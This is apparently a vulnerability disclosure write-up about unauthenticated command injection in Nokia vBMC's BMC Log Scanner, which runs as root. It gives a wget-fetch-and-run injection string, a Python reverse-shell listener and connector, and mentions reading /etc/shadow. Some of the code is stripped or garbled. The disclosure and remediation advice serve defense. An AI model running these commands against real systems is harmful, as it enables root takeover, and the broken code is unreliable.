Nokia vBMC — BMC Log Scanner Remote Code Execution

Matthew Gregory
4 min readJan 18, 2024


Note: This write-up was a collaboration between my co-worker (Carlos Andres Gonzalez) and I, which was produced in October of 2022. The delay in posting this write-up comes from ensuring the remediation was completed before publicly disclosing.


The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant because this service runs as root.

Steps to Reproduce:

In the Search Pattern field, type:


Replacing the word “command” above with any Linux command. Root access can be confirmed with the id command or any other command that would require root access, such as displaying the contents of the /etc/shadow file.”


● Ensure that proper input sanitization is in place for all fields that accept user input.

● Services should be run based on the principle of least privilege and not be run with full access to the system unless absolutely necessary.


Initial Command Execution

Entering the command injection string at the BMC Log Scanner GUI on APP host APP-000 port 9988:

The results of the id command showing that the service is running as the root user:

From a DB Host

Note that when recreating this scenario from one of the DB hosts, the commands run on both APP servers simultaneously.

Entering the command injection string at the BMC Log Scanner GUI on DB host DB-000.

The results of the command injection on DB-000 showing that it ran on both APP hosts.

Obtaining a root Level Shell

This vulnerability can also be used to initiate a reverse shell connection back to one of the Pilot hosts with no access to the App host besides being able to reach the web app. Since the service runs as root, the interactive shell has root privileges on the App host. The process for this is slightly more involved and requires the following steps:

● Write a Python script (see the References section) that will open a port and listen for a connection. Store that on a Pilot host.

● Start the listener on the Pilot host.

● Write a Python script (see the References section) that will connect to a listener for a reverse shell and store that on a Pilot host.

● Start a Python web server on the Pilot host.

● Enter the following command injection code on the BMC Log Scanner:

;”;wget -O /tmp/;python /tmp/

The code above will cause the APP server to connect back to the Pilot server to pick up the script and then run the script.

Running the listener using the Python3 binary available at /PLATsoftware/bmcp/python/bin/python3:

Running the web server:

Entering the command — in this case, the web page simply hung at this screen:

However, the web server showed that the connector file was picked up:

And the listener received a connection.The id and ip a commands were run after the connection was established to confirm the machine that the shell was opened from:


The code for the Python3 listener is below:

import socket, sys, time

def listen(ip,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((ip, port))
print(“Listening on port “ + str(port))
conn, addr = s.accept()
print(‘Connection received from ‘,addr)
while True:

#Receive data from the target and get user input ans = conn.recv(1024).decode() sys.stdout.write(ans)
command = input()

#Send command
command += “\n” conn.send(command.encode()) time.sleep(1)

#Remove the output of the “input()” function sys.stdout.write(“\033[A” + ans.split(“\n”)[-1])


The code for connecting to the listener is below:

import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((“”,8001)); os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[“/bin/sh”,”-i”]);



Matthew Gregory
Matthew Gregory

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